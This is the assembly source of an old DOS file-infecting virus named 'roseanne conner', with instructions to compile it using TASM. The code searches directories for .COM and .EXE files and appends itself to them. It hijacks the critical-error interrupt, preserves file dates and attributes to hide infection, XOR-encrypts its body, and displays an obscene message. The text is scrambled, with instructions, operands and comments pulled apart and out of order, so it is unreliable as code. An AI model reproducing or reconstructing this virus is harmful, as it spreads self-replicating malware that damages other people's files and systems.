
  • November 2019
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; ;

roseanne conner written by mutation interrupt to compile this use tasm /m roseanne.asm


segment public 'code' assume cs:code org 100h

id = 'ab'

; all .com files start here ; id for infected files

start: db 0e9h,0,0 virus:

; jump to the next command

call realcode: pop nop sub nop nop nop nop nop call


; push current location on stack


; get location off stack

bp,offset realcode

; adjust it for our pointer


; decrypt the virus first



; from here is encrypted


cmp je

sp,id restoreexe

; com or exe?

lea mov

si,[bp+offset oldjump] di,100h

; location of old jump in si ; location of where to put it in


; save so we could just return


push when done movsb movsw jmp restoreexe: push push push pop push pop lea lea movsw movsw movsw movsw exitrestore: lea call

exitrestore ds es cs ds cs es si,[bp+jmpsave2] di,[bp+jmpsave]

; move a byte ; move a word

; save exe ds ; save exe es ; ds now equals cs ; es now equals cs ; ; ; ;

dx,[bp+offset dta] set_dta

move move move move

a a a a

word word word word

; where to put new dta ; move it


mov int mov mov

ax,3524h 21h word ptr [bp+oldint24],bx word ptr [bp+oldint24+2],es

; get int 24 handler ; to es:bx ; save it

mov lea int

ah,25h dx,[bp+offset int24] 21h

; set new int 24 handler ; ds:dx->new handler

push pop

cs es

; restore es ; 'cuz it was changed

mov mov lea int

ah,47h dl,0h si,[bp+offset currentdir] 21h

; get the current directory ; on current drive ; where to keep it

lea call lea call

dx,[bp+offset exefilespec] findfirst dx,[bp+offset comfilespec] findfirst

lea mov int jnc

dx,[bp+offset directory] ah,3bh 21h dirloop

; where to change too '..' ; change directory

mov lea int

ah,9 dx,[bp+virusname] 21h

; display string

mov lds int

ax,2524h dx,[bp+offset oldint24] 21h

; restore int 24 handler ; to original

push pop

cs ds

lea mov int

dx,[bp+offset currentdir] ah,3bh 21h

; location of original dir ; change to there

mov call

dx,80h set_dta

; location of original dta ; put it back there

cmp jz

sp,id-4 returnexe

; exe or com?

; if no problems the look for


; do this because the ds gets




returnexe: pop pop

; return to 100h to original

es ds

; get original es ; get original ds

mov add add add cli manipulation mov mov sti db jmpsave dd stacksave dd jmpsave2 dd stacksave2 dd

ax,es ax,10h word ptr cs:[bp+jmpsave+2],ax ax,word ptr cs:[bp+stacksave+2]

; clear int's because of stack

sp,word ptr cs:[bp+stacksave] ss,ax 0eah ? ? 0fff00000h ?

; ; ; ;

findfirst: mov mov

ah,4eh cx,7

; find first file ; find all attributes

findnext: int jc

21h quit

; find first/next file int ; if none found then change dir


; infect that file

ah,4fh findnext

; find next file ; jump to the loop

ax,3d00h open

; open file for read only

mov mov lea int

ah,3fh cx,1ah dx,[bp+offset buffer] 21h

; read from file

mov int

ah,3eh 21h

; close file

word ptr [bp+buffer],'zm' checkexe ax,word ptr [bp+dta+35] ax,'dn'

; ; ; ;


; yup so get another file

bx,[bp+offset dta+1ah] cx,word ptr [bp+buffer+1] cx,eof-virus+3

; get file size ; get jump loc of file ; add for virus size


; does file size=file jump+virus

call findnext2: mov jmp quit:


infection: mov call

cmp jz mov cmp (reverse order) jz checkcom: mov mov add cmp size

jump ssss:oooo jump location original cs:ip used with carrier file

; location to store them

exe? why yes, yes it is! get end of file name in ax does end in comma'nd'?

jz jmp checkexe: cmp jz jmp

quitinfect infectcom

; yup then get another file

word ptr [bp+buffer+10h],id quitinfect infectexe

; check exe for infection ; already infected so close up

bx,3 si,[bp+buffer] di,[bp+oldjump]

; adjust for new jump

quitinfect: ret infectcom: sub lea lea movsw movsb mov mov mov jmp infectexe: les mov mov


[bp+buffer],byte ptr 0e9h word ptr [bp+buffer+1],bx

; save for later


; number of bytes to write

finishinfection ax,dword ptr [bp+buffer+14h] word ptr [bp+jmpsave2],ax word ptr [bp+jmpsave2+2],es

; load es with seg address ; save old cs:ip

les mov mov

ax,dword ptr [bp+buffer+0eh] word ptr [bp+stacksave2],es word ptr [bp+stacksave2+2],ax

; save old ss:sp ; save old cs:ip

mov mov shl xchg les mov push push

ax, word ptr [bp+buffer+8] cl,4 ax,cl ax,bx ax,[bp+offset dta+26] dx,es ax dx

; get header size



; subtract header size from

sbb mov div

dx,0 cx,10h cx

; subtract the carry too ; convert to segment:offset form

mov mov

word ptr [bp+buffer+14h],dx word ptr [bp+buffer+16h],ax

; put in new header ; cs:ip

mov mov pop pop

word ptr [bp+buffer+0eh],ax word ptr [bp+buffer+10h],id dx ax

; ss:sp ; put id in for later ; get the file length back

add adc

ax,eof-virus dx,0

; add virus size ; add with carry

; get files size from dta ; its now in dx:ax ; save these

mov push shr ror stc adc pop and

cl,9 ax ax,cl dx,cl

; calculates new file size

mov mov

word ptr [bp+buffer+4],dx word ptr [bp+buffer+2],ax

; save new file size in header

push pop

cs es

; es = cs

dx,ax ax ah,1

mov cx,1ah (header) finishinfection: push cx xor cx,cx call attributes

; number of bytes to write ; save # of bytes to write ; set attriutes to none

mov call

al,2 open

; open file read/write

mov lea pop int jc

ah,40h dx,[bp+buffer] cx 21h closefile

; write to file ; location of bytes ; get number of bytes to write

mov call

al,02 move_fp

; move fpointer to eof


; get time for our encryption

21h dh,0

; if its seconds are zere get

get_time [bp+enc_value],dh

; use seconds value for


; encrypt and infect the file

ax,5701h cx,word ptr [bp+dta+16h] dx,word ptr [bp+dta+18h] 21h

; set files date/time back ; get old time from dta ; get old date

mov int

ah,3eh 21h

; close file

xor mov call

cx,cx cl,byte ptr [bp+dta+15h] attributes

get_time: mov value int cmp another je mov encryption call closefile: mov mov mov int


; get old attributes


mov xor xor int retn

ah,42h cx,cx dx,dx 21h

; move file pointer ; al has location ; clear these

mov int retn

ah,1ah 21h

; move the dta location

mov lea int xchg ret

ah,3dh dx,[bp+dta+30] 21h ax,bx

; open file ; filename in dta

ax,4301h dx,[bp+dta+30] 21h

; set attributes to cx ; filename in dta



attributes: mov lea int ret int24: mov iret


; file handle in bx

; new int 24h (error) handler ; fail call ; return from int 24 call

virusname db 'roseanne conner - ya! fuck you too...',10,13 author db 'mutation interrupt',10,13 ; author of this virus made_with db '[november 1994]',10,13,'$' ; please do not remove this comfilespec exefilespec directory oldjump quit

db '*.com',0 db '*.exe',0 db '..',0 db 0cdh,020h,0h

encrypt_infect: lea lea mov move_loop: movsb loop lea call moved ret move_begin push lea call procedure pop return

si,[bp+offset move_begin] di,[bp+offset workarea] cx,move_end-move_begin

; ; ; ;

holds type of file to look for holds type of file to look for directory to change to old jump. is int 20h for file

; location of where to move from ; where to move it too ; number of bytes to move ; moves this routine into heap

move_loop dx,[bp+offset workarea] dx

equ $ bx dx,[bp+offset encrypt_end] dx bx

; jump to that routine just

; marks beginning of move ; save the file handle ; call the encrypt_decrypt ; get handle back in bx and

return move_end

mov mov lea int push lea call pop ret


ah,40h cx,eof-virus dx,[bp+offset virus] 21h bx dx,[bp+offset encrypt_end] dx bx

; marks the end of move



; marks the end of encryption

00h $

workarea db move_end-move_begin dup (?) routine currentdir db 64 dup (?) dta db 42 dup (?) buffer db 1ah dup (?) oldint24 dd ? handler code

ends end

; decrypt the file and return ; get handle back in bx and


enc_value db for nul effect equ

; save the file handle


encrypt_decrypt: lea bx,[bp+encrypt_start] mov cx,encrypt_end-encrypt_start mov dh,[bp+enc_value] encrypt_loop: mov ah,cs:[bx] xor ah,dh mov cs:[bx],ah inc bx loop encrypt_loop ret


; write to file ; number of bytes ; where to write from


; where to start encryption ; number of bytes to encrypt ; value to use for encryption ; ; ; ;

get a byte in ah xor it put it back move to next byte and loop

; hold the encryption value 00 ; marks the end of file ; holds the encrypt_infect ; ; ; ;

holds the current dir location of new dta holds exe header storage for old int 24h